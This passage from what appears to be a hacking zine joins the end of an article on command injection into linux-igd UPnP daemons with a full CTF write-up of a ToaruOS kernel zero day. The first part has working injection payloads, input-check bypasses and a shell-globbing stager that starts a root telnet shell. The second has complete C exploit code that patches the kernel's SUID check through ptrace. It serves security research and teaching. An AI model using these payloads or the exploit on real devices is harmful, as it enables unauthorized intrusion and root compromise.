+-------+----------------+------------------------------------------------+ We will use this feature to remove the parts we don't need by using backquotes, which will (since these interpreted commands produce no output on stdout) concatenate our various injection points. $ U ;A` --dport `BBB` -j DNAT --to `CCCCCCCCCCCCC`:`DDDD ... sh: --dport: command not found sh: -j: command not found sh: ABBBCCCCCCCCCCCCCDDDD: command not found $ U ;A` -d `CCCCCCCCCCCCC` --dport `DDDD -j ACCEPT ... sh: -d: command not found sh: --dport: command not found sh: ACCCCCCCCCCCCCDDDD: command not found We observe that the command ABBBCCCCCCCCCCCCCDDDD (length 21) is executed, as well as the ACCCCCCCCCCCCCDDDD (length 18) command. You might say that using 21 characters (or 18) to exploit a command injection is simple enough to do with minimal effort. So let's make things a little more complex. --------------------------------------------------------------------------- --[ 6. Becoming a Bash Jiu Jitsu purple belt Some of the variants of linuxigd (linux-igd) you may come across, might implement security checks on specific values. For example, some of the most up-to-date variants, check the values of XML nodes, NewExternalPort and NewInternalPort with the function atoi(). You may encounter code snippets like the one below.
ext_port = GetFirstDocumentItem(ca_event->ActionRequest, "NewExternalPort")
...
/* validate the ports */
a = atoi(ext_port);
if (a > 65535 || a < 1)
{
return -1;
}
The concept of implementing value control is a good one, but unfortunately for developers, it is done incorrectly by using the atoi() function. Consider the file test_atoi.c as an example, containing the following C code.
#include <stdio.h>
#include <stdlib.h>
int main() {
char numberStr[] = "5`BB`";
int a = atoi(numberStr);
if (a > 65535 || a < 1)
{
return -1;
}
return 0;
}
Compile it using the command below, then after executing it, let's retrieve the value of the return code. $ gcc test_atoi.c -o test_atoi $ ./test_atoi $ echo $? 0 It is clear that the payload (value contained in the NewExternalPort node) has bypassed the security check. What happens is that the atoi() function converts a string into an integer, stopping at the first non-numeric character. The function will first encounter the character 5, which is a valid numeric character. After the 5, it encounters the backtick character. Since backticks are not part of a valid integer, atoi() will stop parsing the string at this point. By using a payload that bypasses this check, the number of characters available for command injection will be reduced. Nodes NewExternalPort and NewInternalPort must follow the structure of "5`BB`" and "6`DDD" for example (but it depends on the target you want to exploit). Although we currently have fewer characters at our disposal, let's try to go one step further and make the security features more complex. --------------------------------------------------------------------------- --[ 7. Becoming a Bash Jiu Jitsu black belt Port checks having been bypassed, let's imagine that the target now checks the IP value using the inet_aton() function as shown below.
int_ip = GetFirstDocumentItem(ca_event->ActionRequest, "NewInternalClient")
...
/* validate the IP address */
struct in_addr req_addr;
if (0 == inet_aton(int_ip, &req_addr))
{
return -1;
}
Consider the file test_inet_aton.c as an example, containing the following C code.
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
int main() {
const char *ip_str_a = "192.168.1.1";
const char *ip_str_b = "192.168.1.1 `C`";
struct in_addr addr_a;
struct in_addr addr_b;
if (0 == inet_aton(ip_str_a, &addr_a)) {
printf("Internal Error.\n");
return -1;
}
if (0 == inet_aton(ip_str_b, &addr_b)) {
printf("Internal Error.\n");
return -1;
}
return 0;
}
Compile it using the command below, then after executing it, let's retrieve the value of the return code. $ gcc test_inet_aton.c -o test_inet_aton $ ./test_inet_aton $ echo $? 0 What happens is that, inet_aton() will succeed in converting the IP address as long as the initial part of the string is a valid IP address format. After parsing "192.168.1.1", inet_aton() will encounter " `C`". These characters are not valid for an IP address and are simply ignored by inet_aton(). Consequently, structs in_addr will contain the binary representation of the IP address "192.168.1.1". $ U ;A` --dport 5`BB` -j DNAT --to 192.168.1.1 `C`:6`DDD ... sh: --dport: command not found sh: -j: command not found sh: :6: command not found sh: ABBCDDD: command not found $ U ;A` -d 192.168.1.1 `C` --dport `DDDD -j ACCEPT ... sh: -d: command not found sh: --dport: command not found sh: ACDDDD: command not found All security checks have been bypassed, leaving 7 (or 6) characters to carry out the command injection in case the IP is 192.168.1.1 and 9 (or 8) if IP have 10.10.0.1 as format. As it can be understood, the format of the IP of the target will have a consequence on the number of characters controllable for the injection. Depending on the vendor, different default IPs can be defined for their network equipment, but the format of the two IPs mentioned above are generally the most common. --------------------------------------------------------------------------- --[ 8. Claiming supremacy over the mats As it may be evident, the intriguing aspect arises when attempting to answer the question: How can arbitrary commands be executed when only 7 characters are known to be controllable? The answer is, to take advantage of globbing. Globbing is the process of pattern matching for filenames and behaves similarly across shells like sh, bash, ash, and dash, as they all follow POSIX standards. Common globbing patterns such as *, ?, and [...] are supported in all these shells, allowing users to match groups of files using wildcards. However, bash stands out by offering advanced features like extended globbing and recursive globbing with **, which are not available in ash, dash, or sh, which are more minimalistic and focus on speed and efficiency. The order in which files are matched during globbing in shells generally follows lexicographical order, but it may vary depending on the system's locale. Typically, in UTF-8 or ASCII environments, files starting with digits come first, followed by uppercase letters and then lowercase letters. For files whose filenames contain special characters, different behavior have been observed where they may be listed either first or last. While the basic globbing behavior is consistent across all shells, differences may arise if the locale changes, affecting how special characters, numbers, and letters are ordered. Here is a simple example. Consider the previous virtual machine, if files are created using the command below. $ touch .A .B .a .b .1 The following command is used with as shell bash (or zsh). $ echo .? .1 .a .A .b .B However, with ash (BusyBox version), the following result is obtained. $ echo .? .. .1 .A .B .a .b After a little investigation the discrepancies may come from the locale differences between interpreters. ash use the C locale (also known as the POSIX locale) which is the default system locale that is typically used in Unix-like operating systems when no specific locale is set. And the related sorting does not take into account accents, case sensitivity, or linguistic rules. Characters are sorted in the following order (ASCII values of characters). - Digits (0-9) first. - Uppercase letters (A-Z) next. - Lowercase letters (a-z) last. - Special characters (like !, #, etc.) have a predefined order, which is based on their ASCII values. It is time to put little dishes into the big ones and mix all the ingredients together to make a good soup. To do this, the first thing we need to do is define the only limitation that our technique confronts us with. As a stager is about to be created, the current directory of the process being exploited (upnpd) must be writable. The CWD environment variable typically refers to the current working directory of the shell or process. It holds the path of the directory in which the process is running or where it was launched from (however, it is important to note that CWD is not a standard environment variable in all systems—it's more commonly used in certain applications or scripts to track the current directory). Alternatively, the /proc/self/cwd symbolic link in Linux can be used to track the current working directory of a running process by pointing to the directory in which the process is currently operating. Since /proc/self refers to the current process, accessing /proc/self/cwd provides the absolute path to that process’s working directory. It is to be noted that this link is automatically updated when the process changes its working directory, such as when it executes the cd command or changes directories programmatically. By reading the target of /proc/self/cwd, the working directory of a process can be programmatically determine at any given time (making it a useful tool for monitoring). Let's start with the simplest case (using ash), taking control of the target when we can execute an 8-character command. Create files named "killall" and "telnetd". $ >killall $ >telnetd Kill telnetd and restarting it with the desired options (-lsh). $ k* t* $ t* -lsh Yes, it is that simple. The same process may be used with 7 characters. Clean current directory (/proc/self/cwd). $ rm -r * Writing string "killal\n" into ".a". $ >killal $ >echo $ *>>l $ cp l .a $ rm -r * Writing string " echo\n" into ".c". $ >" " $ >echo $ e* *>>l $ cp l .c $ rm -r * Writing string "telnet\n" into ".d". $ >telnet $ >echo $ *>>l $ cp l .d $ rm -r * Writing string "lsh\n" into ".g". $ >lsh $ >echo $ *>>l $ cp l .g $ rm -r * Writing string "killal" into ".a". $ >head $ cp .a f $ cp f h* $ rm f $ >-c $ >6 $ h* *>>h $ cp h .a $ rm h Writing string "telnet" into ".d". $ cp .d f $ cp f h* $ rm f $ h* *>>h $ cp h .d $ rm h Writing string "lsh" into ".g". $ cp .g f $ cp f h* $ rm f $ rm 6 $ >3 $ h* *>>h $ cp h .g $ rm h Writing string " " into ".c". $ cp .c f $ cp f h* $ rm f $ rm 3 $ >1 $ h* *>>h $ cp h .c $ rm h Writing string "l" into ".b". $ >echo $ e* l>>f $ rm echo $ cp f h* $ rm f $ h* *>>h $ cp h .b $ rm h Writing string "d" into ".e". $ >echo $ e* d>>f $ rm echo $ cp f h* $ rm f $ h* *>>h $ cp h .e $ rm h Writing string "-" into ".f". $ >echo $ e* ->>f $ rm echo $ cp f h* $ rm f $ h* *>>h $ cp h .f $ rm h Executing command "killall telnetd". $ >cat $ cp .a A $ cp .b B $ cp .c C $ cp .d D $ cp .e E $ c* ?|sh Executing command "telnetd -lsh". $ cp .d A $ cp .e B $ cp .c C $ cp .f D $ cp .g E $ c* ?|sh --------------------------------------------------------------------------- --[ 9. Conclusion Of course, the chosen target was just an excuse (as many vulnerabilities have already been identified and exploited in the past) for presenting the very subject of the article, which is the optimization of command injection in the context of using a limited number of characters. We have demonstrated that even with just a few characters at our disposal, we are capable of writing a stager (in a file) that can execute a real malicious payload and thus compromise a device. --------------------------------------------------------------------------- --[ 10. Acknowledgments (527e876c0d7e3049d1d99f00f3fbf9a9b0c63ccf) I'd like to thank all the people we have come to know and will come to know in our lives as hackers, as well as all those who have made the effort to document their research work, and will do so in the future. We can finally become immortals. Thank you for everything. --------------------------------------------------------------------------- --[ 11. References
|=-----------------------------------------------------------------------=| |=----------------------=[ 8 - Breaking ToaruOS ]=-----------------------=| |=-----------------------------------------------------------------------=| |=----------------=[ CTF as a kernel exploitation intro ]=---------------=| |=-----------------------------------------------------------------------=| |=-------------=[ NOT / Firzen ]=---------=[ Binary Gecko ]=-------------=| |=-----------------------------------------------------------------------=| ---[ Index 0 - Introduction 1 - The Challenge 1.1 - Environment 2 - ToaruOS 2.1 - Mitigations 3 - Kernel Bugs 4 - Searching for a bug 4.1 - How to open a file 4.2 - Becoming root normally 4.3 - SUID on the kernel side 4.4 - ptrace 4.5 - Poking the first hole 4.6 - Flat mapping excursion 5 - The bug 6 - Write-what-where, but where? 6.1 - No KASLR 6.2 - SUIDn't 7 - In Closing A - Exploit Code
In this article I would like to talk about the process of finding and exploiting a kernel zero day. I will use a CTF challenge about finding zero days in a hobby OS kernel as scaffolding and walk through the layers of protection that the kernel provides and one of the zero days used to break them. I think it is a great way to dive into some of the lower level code and bug classes that can only occur on a kernel level without having to first understand the internals of a major modern OS kernel and its many mitigations.
During the 38C3 conference HXP hosted a CTF that included a kernel exploitation challenge called "Ser Szwajcarski" (polish for swiss cheese). Apart from the name the challenge was unusual in two other respects: Firstly, it wasn't for any major OS, but instead for a relatively niche hobby kernel.
Secondly, it targeted the current version at the time of the OS.
So really, the challenge was to find a zero day for the OS.
Before we get into the details, what was the setup of the challenge?
You were provided a low-priv remote shell running on ToaruOS and had
to access the flag in a file that only the root user could access.
They also provided a Dockerfile so that you could set up an identical local test environment.
So, what kind of OS is ToaruOS? It is a unix-like hobby OS written by Kevin Lange. It is one of the more advanced hobby OS projects and still actively being developed. But this isn't a history lesson, so I'll get straight to the parts that are relevant to us.
Modern operating systems employ a large number of mitigations to make them more resilient, for safety and for security. I'll give a brief overview of the major common ones on x86_64 Linux and then go over how they apply to ToaruOS in 3.1.5. Basically all of them have analogues for different architectures and operating systems, but that's way too much to cover. I am also leaving out several other mitigations that aren't relevant to the vulnerability or are Linux-specific.
On x86 the CPU can run with several distinct privilege levels called rings. These restrict which actions the CPU is allowed to perform. For example you can not change the CR3 register, which points to the page directory, while in ring 3. For this article all you need to know is that ring 0 is 'kernel mode' and ring 3 is 'user mode'. This is why system calls exist. A system call is just a CPU in ring 3 causing an interrupt that is handled by the kernel in ring 0. That code in the kernel then interprets the request and checks if it is sane and allowed. If so it then performs an action on behalf of that ring 3 request.
A page is a physical region of memory that can be mapped to one or more
virtual addresses. These mappings have several flags that determine
how the mapped page can be accessed. For this article we only care
about the following 3 flags:
P - Present Is this page mapped at all? R/W - Read/Write Is this page read-only or writable? U/S - User/Supervisor Is this page accessible from ring 3 or only ring 0? I want to explicitly point out that these flags exist for each separate mapping of a page. The same physical page can be mapped at multiple virtual addresses with different permissions.
The kernel version of user space ASLR you may already be familiar with. What this effectively means is that you don't know ahead of time where in memory the kernel will be mapped.
These two mitigations prevent the kernel from accessing userspace memory directly through a pointer. Any data access has to instead go through special functions that will temporarily disable the mitigation. Any execution access of userspace memory in kernel mode is completely disallowed. When the kernel returns to userspace it has to also switch to user mode at the same time.
+ CPU rings
+ Page Protections
- KASLR
- SMEP/SMAP
On ToaruOS the first two mitigations exist and the latter two don't. This is more or less expected since the first two are mainly enforced by the hardware architecture rather than the OS. The first three of those are the ones you should keep in mind for the rest of this article.
We are all very used to the security guarantees that our OS provides and most of us probably take them for granted. Of course, you can't open /etc/shadow as a normal user. Of course, you can't just attach a debugger to a root process and alter what it does. Of course, you can't change the owner of an suid executable and keep the suid flag. But all of those things are enforced by the operating system. It is common to become root or SYSTEM to demonstrate a kernel exploit, but the truth is that you effectively have even higher privileges. If the OS, specifically the kernel, isn't stopping you, you can do anything. (Yes, I am ignoring hypervisor based security for dramatic reasons) All this to say: Kernel bugs may have the same root causes as many user space bugs, but there are also entirely different bug classes that can only really exist in a kernel. So, I encourage you to challenge your preconceptions and question even those "obvious" security concepts. ToaruOS has quite a few similarities to Linux, so it is tempting to assume it provides all of the same guarantees.
Since the kernels' job is to enforce security guarantees it makes sense to start by looking at how exactly it does that. Our goal is simply to read a file, so let's look at how we may be able to open it.
If you want to open a file in C you call the libc open() function. This function internally then issues the corresponding system call. The kernel side code of ToaruOS that handles the syscall is sys_open() in '/kernel/sys/syscall.c'.
long sys_open(const char * file, long flags, long mode) {
PTR_VALIDATE(file);
if (!file) return -EFAULT;
fs_node_t * node = kopen((char *)file, flags);
int access_bits = 0;
if (node && (flags & O_CREAT) && (flags & O_EXCL)) {
close_fs(node);
return -EEXIST;
}
...
The first thing the kernel does is to check that 'file' is a valid user space pointer. The 'ptr_validate()' function checks that the address is in user space and is mapped with appropriate flags. This will be important later. It then tries to open that file with 'kopen' and then performs access checks to determine if the file already exists. Afterwards, it continues to perform access checks. This is how the OS enforces file system access permissions. If you want to open a file it will check all of the permissions before the file is ever visible in user mode.
...
int fd = process_append_fd(this_core->current_process, node);
...
return fd;
}
If all the checks have passed 'process_append_fd()' is called and the file descriptor is now visible in the user mode process. 'fd' is then returned from the system call and the libc then returns it from 'open()'. Since the checks here look sane, we need to change either the files permissions or elevate our privileges. Let's take a look at elevating privileges.
You may have wondered how 'sudo' can make you 'root' on a Linux system. It is definitely one of those "obvious" things I mentioned earlier, so you may never have given it a second thought. But if you do, it seems a little odd. 'sudo' is a program that runs in 'user mode' in ring 3 like any other. It can't issue a magic CPU instruction that changes the user and it can't write in kernel memory. If it could then so could any other user mode process. Clearly it uses the 'setuid()' libc function, but using it to switch to another user requires privileges. But we can run 'sudo' as a low-privileged user to become root, so what makes 'sudo' special? You probably already know that the way it works is that the file system doesn't just store permissions for read/write/execute access, but can also store flags and capabilities. Particularly the SUID flag denotes that a program should be executed not as the user that starts it, but as the user that owns the file. On ToaruOS it works exactly the same way as it does on Linux:
local@livecd ~$ ls -al /bin/sudo
-r-sr-xr-x 1 root root 10384 Mar 16 17:26 /bin/sudo
Note that instead of 'x' it shows 's' for the execute permission, showing the SUID bit is set.
The implementation of the SUID bit is very straight-forward in ToaruOS and can be found in 'elf_exec()' in '/kernel/misc/elf64.c'.
if ((file->mask & S_ISUID) &&
!(this_core->current_process->flags &
(PROC_FLAG_TRACE_SYSCALLS | PROC_FLAG_TRACE_SIGNALS)))
{
/* setuid */
this_core->current_process->user = file->uid;
}
This is already the full implementation. If the 'S_ISUID' flag of the file is set the user id of the process is set to the owner of the file. The second half of the if clause exists so that if you start an SUID binary with a debugger attached it doesn't change the user.
ToaruOS has the ability to debug programs in user space. It has a 'ptrace' syscall to do this, similar to the way it works on Linux. 'ptrace' lets you attach to a process - the 'tracee' - and to manipulate it in various ways as the 'tracer'. You can read registers, single-step, read or alter memory, etc. 'ptrace_handle()' in '/kernel/sys/ptrace.c' implements it in ToaruOS. That function is just a huge switch statement based on which of these operations was requested. Instead let's look at 'ptrace_peek()' and 'ptrace_poke()' for the moment. 'peek' reads a byte and 'poke' writes a byte in the tracee. Keep in mind that when we are in the 'ptrace' syscall the current process is the 'tracer', not the 'tracee'. Let's start with 'ptrace_peek()':
long ptrace_peek(pid_t pid, void * addr, void * data) {
if (!data || ptr_validate(data, "ptrace")) return -EFAULT;
process_t * tracee = process_from_pid(pid);
if (!tracee
|| (tracee->tracer != this_core->current_process->id)
|| !(tracee->flags & PROC_FLAG_SUSPENDED)
)
return -ESRCH;
Again it starts by verifying a user provided pointer 'data'. But notably it does NOT verify 'addr'. We will get back to that. Then it looks up the 'tracee' process. If the 'tracee' doesn't exist, or if we aren't the 'tracer', or if the process isn't in a suspended state we will error out.
union PML * page_entry = mmu_get_page_other(
tracee->thread.page_directory->directory, (uintptr_t)addr);
if (!page_entry) return -EFAULT;
if (!mmu_page_is_user_readable(page_entry)) return -EFAULT;
Next, it gets the page table entry of the provided address 'addr' in the 'tracee' process. The reason 'ptr_validate()' isn't used for 'addr' is that the address is a pointer to memory in the currently running process, but instead in the 'tracee'. If there is no corresponding entry we exit with '-EFAULT'. If there is an entry we check if it is user readable and if not we error out as well. The check is implemented in a macro.
#define mmu_page_is_user_readable(p) (p->bits.user)
It checks if the user bit on the page is set. What that means is that we could just read the page from ring 3, so we can not access anything new this way. This all seems sensible, so let's move on.
Taking a look at 'ptrace_poke()' it is very similar to 'ptrace_peek()'.
long ptrace_poke(pid_t pid, void * addr, void * data) {
if (!data || ptr_validate(data, "ptrace")) return -EFAULT;
process_t * tracee = process_from_pid(pid);
if (!tracee
|| (tracee->tracer != this_core->current_process->id)
|| !(tracee->flags & PROC_FLAG_SUSPENDED)) return -ESRCH;
union PML * page_entry = mmu_get_page_other(
tracee->thread.page_directory->directory, (uintptr_t)addr);
if (!page_entry) return -EFAULT;
if (!mmu_page_is_user_writable(page_entry)) return -EFAULT;
The only difference is that we check if the page is user writable now instead of readable, which seems sensible. But looking at the macro there's a glaring omission:
#define mmu_page_is_user_writable(p) (p->bits.writable)
It does check if the writable bit is set, but it does NOT check for the user bit.
Feel free to skip this section, it just clarifies some details about the way the write into another process works and is a little more verbose than the rest of the article. On x86 there is only one page table at a given time (per CPU). Generally that page table is the one of the address space of the currently running process. But 'ptrace_poke' wants to write to a virtual address in the address space of a different process. You might have noticed earlier that the function that looks up the page table entry is called 'mmu_get_page_other()'. The 'page_entry' that the function returns is a physical page that is very likely not currently mapped anywhere in the address space of the current process. Looking at the rest of the ptrace_poke() function will help make things clearer.
uintptr_t mapped_address =
mmu_map_to_physical(tracee->thread.page_directory->directory,
(uintptr_t)addr);
if ((intptr_t)mapped_address < 0 && (intptr_t)mapped_address > -10)
return -EFAULT;
'mapped_address' is assigned the physical address that the virtual address 'addr' is mapped to in the 'tracee'. In order for a kernel to not have to constantly map and unmap pages it is common to instead have a flat virtual mapping at some offset that corresponds to every physical address minus that offset. In ToaruOS that offset is:
#define HIGH_MAP_REGION 0xffffff8000000000UL
void * mmu_map_from_physical(uintptr_t frameaddress) {
return (void*)(frameaddress | HIGH_MAP_REGION);
}
This flat mapping is writable because the kernel is responsible for performing access checks and because it can not know ahead of time if a a given physical address may need to be written to in the future. Finally here is the rest of 'ptrace_poke()'.
uintptr_t blarg = (uintptr_t)mmu_map_from_physical(mapped_address);
*(char*)blarg = *(char*)data;
return 0;
'blarg' becomes the pointer into the flat mapping which is writable and 'data' is written to it. As mentioned earlier, the access flags of a memory page are a property of the virtual mapping and not of the page itself. That is why 'mmu_page_is_user_writable()' needs to be explicitly checked by the kernel instead of just attempting to write and seeing if it fails.
Why is that a problem and what can we do with it? On first thought it may seem useless. The page probably doesn't have the user bit set anyway, so we still can't write to it from user mode. But during a syscall we aren't in user mode. The kernel handles syscalls in ring 0 and it is allowed to access non-user pages. 'ptrace()' is exactly such a syscall, which means that if we provide a valid kernel address and it is writable the write will succeed. Luckily, the mapping of the kernel itself is read/write/execute. I suspect because it is a LOT simpler to set it up that way before remapping the kernel to a high address. This means that for any address in the kernel itself we will pass the 'mmu_page_is_user_writable()' check. So this bug gives us a very nice one byte write-what-where primitive.
Ideally we would like to just overwrite our own processes' uid to be 0 to become root. Unfortunately for us, the check in 'ptrace_peek()' is correct. So, while we can write in the kernel, we can't read anything anywhere in it.
ToaruOS doesn't have KASLR, so we know exactly where in memory the kernel is ahead of time. But what does that gain us? We could try to overwrite a global pointer, for example the current process and point it into our user space memory to a fake data structure. This would probably work since ToaruOS doesn't have SMAP. We could overwrite the address of an interrupt handler or a syscall or some other function pointer and redirect it so that we can run our own code in ring 0. This, too, would probably work since ToaruOS doesn't have SMEP. But both of these strategies require some extra effort in faking a data structure or writing C code that works properly in ring 0.
The exploit strategy I ended up using was a lot simpler to implement. We can alter kernel memory anywhere, even the .text section and we know where everything is since there's no KASLR. Remember the SUID check in 'elf_exec' that I talked about in 5.3? Because we know the exact version of the kernel, we can simply look at the kernel image or read /proc/kallsyms in our local instance to find out at which address in virtual memory that function is.
local@livecd ~$ sudo cat /proc/kallsyms | grep elf_exec
000000000010f300 elf_exec
Disassembling the function with 'objdump' we can find the exact jump instruction that implements the if statement for SUID binaries. It is compiled to a 'jne' (jump not equal) conditional jump instruction that skips past the uid assignment if the binary isn't SUID.
10f365: 0f 85 48 01 00 00 jne 0x10f4b3
To turn 'jne' into 'je' we just need to flip the 0x85 into a 0x84 byte.
10f365: 0f 84 48 01 00 00 je 0x10f4b3
This negates the check so that now only non-SUID binary will assign their owners uid. Afterwards, simply running '/bin/esh' turns you into root and you can read the flag.
I hope this article can help some curious people get started in the kernel security space. If nothing else maybe it can give somebody an appreciation for it. I also hope it doesn't seem like I am disparaging ToaruOS in any way. I really like the project. Security is not its main focus and still it is likely more stable and secure than many other hobby OSes. Kernel security is very very hard and even harder on defense. Kernel security has many pitfalls. Both because it is the core of what protects everything on any OS and also because there are many low level details that we usually have the luxury of ignoring in user space. I want to thank the HXP team for the fun CTF they hosted and my friends who I forced to proof-read for me. In particular Lukas Ratz, who motivated me to participate in the first place.
#include <stdio.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <errno.h>
#include <string.h>
#include <signal.h>
#include <ctype.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/signal.h>
#include <sys/signal_defs.h>
#include <syscall_nums.h>
int main(int argc, char** argv)
{
printf("[+] Starting exploit\n");
pid_t c_pid = fork();
if(c_pid<0)
{
printf("[-] Couldn't fork\n");
return -1;
}
// Child
if(c_pid==0)
{
//attaching debugger so we can ptrace_poke
if(ptrace(PTRACE_TRACEME,0,NULL,NULL))
{
return -1;
}
signal(SIGINT, SIG_IGN);
return 0;
}
int status = 0;
waitpid(c_pid, &status, WSTOPPED);
printf("[+] Child stopped as expected\n");
printf("[+] Replacing suid check\n");
char data[4];
//diff between jnz and je
data[0] = 0x84;
//jmp after compare in elf_exec for suid check
void* target = 0x0010f365+1;
int ret = ptrace(PTRACE_POKEDATA, c_pid, target, &data[0]);
if(ret<0)
{
perror("ptrace");
return -1;
}
printf("[+] Should have broken check, get root shell\n");
char *n_argv[] = {"/bin/esh",NULL};
execve("/bin/esh", n_argv,NULL);
}
|=[ EOF ]=---------------------------------------------------------------=|